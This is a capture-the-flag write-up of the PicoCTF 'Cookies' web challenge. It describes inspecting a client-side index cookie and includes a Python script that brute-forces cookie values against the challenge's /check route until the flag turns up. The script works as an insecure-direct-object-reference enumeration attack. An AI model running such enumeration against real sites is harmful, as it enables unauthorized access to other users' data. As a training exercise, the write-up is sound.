🌐 Cookies

A detailed write-up of the Web challenge 'Cookies' from PicoCTF - 2022

/images/PicoGym/PicoCTF-2022/Cookies/challenge_presentation.png
Challenge Presentation

📊 Challenge Overview

Category Details Additional Info
🏆 Event PicoGym Event Link
🔰 Category Web 🌐
💎 Points Out of 500 total
⭐ Difficulty 🟢 Easy Personal Rating: 1/10
👤 Author madStacks Profile
🎮 Solves 77.985 solve rate
📅 Date 30-01-2025 PicoGym
🦾 Solved By mH4ck3r0n3 Team:

📝 Challenge Information

Who doesn’t love cookies? Try to figure out the best one. http://mercury.picoctf.net:54219/

🎯 Challenge Files & Infrastructure

Provided Files

Files: None

🔍 Initial Analysis

First Steps

Initially, the website appears as follows:

/images/PicoGym/PicoCTF-2022/Cookies/site_presentation.png
Site Presentation

The first thing I did was click the search button to see what would happen. However, the only thing I received was an invalid search, so, as suggested by the challenge title, I decided to inspect the cookies from that invalid search.

/images/PicoGym/PicoCTF-2022/Cookies/invalid_search.png
Invalid Search Cookies

As we can see, the cookie name=-1 immediately stands out. From there, I thought there might be n cookies saved, and that I needed to find the correct one. In fact, after trying to search for snickerdoodle, which was the placeholder content in the input box, I got a valid search.

/images/PicoGym/PicoCTF-2022/Cookies/snickerdoodle.png
Snickerdoodle

/images/PicoGym/PicoCTF-2022/Cookies/snickerdoodle_search.png
Snickerdoodle Search

When I inspected the cookies again using Chrome DevTools, I noticed that the name cookie had changed its value to 0.

/images/PicoGym/PicoCTF-2022/Cookies/name0.png
Name 0

So, I immediately tried changing the value of the cookie to 1, and by refreshing the page with F5, I got this:

/images/PicoGym/PicoCTF-2022/Cookies/name1.png
Name 1

As we can see, we performed a search for another cookie since the name of the cookie at the center of the page changed from snickerdoodle to chocolate. Now that we understand how the page works, all we need to do is find the correct index of the flag cookie to extract it. Let’s move on to the exploitation.

🎯 Solution Path

Exploitation Steps

Initial setup

Rather than doing it by hand, the first thing I did was extract the index with a Python script. The script makes at most 100 requests to the /check route, setting the cookie name=request_number. This way, the value of the name cookie changes with each iteration of the loop: the first request sends 0, the second sends 1, and so on. I then added a regex check, so that once the response to a request was obtained, if the regex matched the response body, the script would print the request index and break out of the loop.

Exploitation

So, for the exploitation, I just ran the script:

python3 exploit.py

And I waited to get the correct name cookie value (the one that contained the flag). Once I obtained it, I changed the name value to 18 (since that was the valid index), and after refreshing the page, I found the flag.

Flag capture

/images/PicoGym/PicoCTF-2022/Cookies/manual_flag.png
Manual Flag

🛠️ Exploitation Process

Approach

The exploit was based on setting a maximum limit of 100 POST requests, changing the value of the name cookie with the index from the request loop. Once I found the correct index (18) that contained the flag, I extracted it from the response using a regex and broke the loop.
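The script described in the Initial setup and Approach sections, reconstructed as an added example (this is not the author's exploit.py): it walks cookie indexes 0 to 99 against /check and stops at the first body matching the picoCTF flag format. The URL, route and cookie name are taken from the write-up; using a GET request and the standard picoCTF{...} pattern are assumptions, and the fetch function is injectable so the search logic can be exercised offline.

```python
import re
import urllib.request
from typing import Callable, Optional, Tuple

# Values from the write-up; the flag pattern is the usual picoCTF format (assumption).
BASE_URL = "http://mercury.picoctf.net:54219"
FLAG_RE = re.compile(r"picoCTF\{[^}]*\}")


def find_flag(fetch: Callable[[int], str], limit: int = 100) -> Optional[Tuple[int, str]]:
    """Try name=0, name=1, ... up to `limit` responses and return (index, flag)
    for the first body matching FLAG_RE, or None if no index within the limit matches.
    `fetch` takes the cookie index and returns the response body as text."""
    for index in range(limit):
        body = fetch(index)
        match = FLAG_RE.search(body)
        if match:
            return index, match.group(0)
    return None


def http_fetch(index: int) -> str:
    """Request /check with the cookie name=<index> (route and cookie name as in the
    write-up; plain GET is an assumption) and return the decoded response body."""
    req = urllib.request.Request(f"{BASE_URL}/check", headers={"Cookie": f"name={index}"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    result = find_flag(http_fetch)
    if result is None:
        print("no flag found in the first 100 cookie indexes")
    else:
        idx, flag = result
        print(f"cookie index {idx} -> {flag}")
```

The weakness this automates is a client-controlled index cookie that the server looks up without authorization: the fix on the server side is to key such lookups on a server-side session rather than on a value the browser can rewrite.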

🚩 Flag Capture

Flag

Proof of Execution

/images/PicoGym/PicoCTF-2022/Cookies/automated_flag.png
Automated Flag
Screenshot of successful exploitation

🔧 Tools Used

Tool Purpose
Python Exploit

💡 Key Learnings

Time Optimization

If there is a placeholder, try the input suggested by the placeholder as the first input to understand how the web application works.

Skills Improved

  • Binary Exploitation
  • Reverse Engineering
  • Web Exploitation
  • Cryptography
  • Forensics
  • OSINT
  • Miscellaneous

📊 Final Statistics

Metric Value Notes
Time to Solve 00:03 From start to flag
Global Ranking Challenge ranking
Points Earned Team contribution

Created: 30-01-2025 • Last Modified: 30-01-2025 • Author: mH4ck3r0n3 • Team: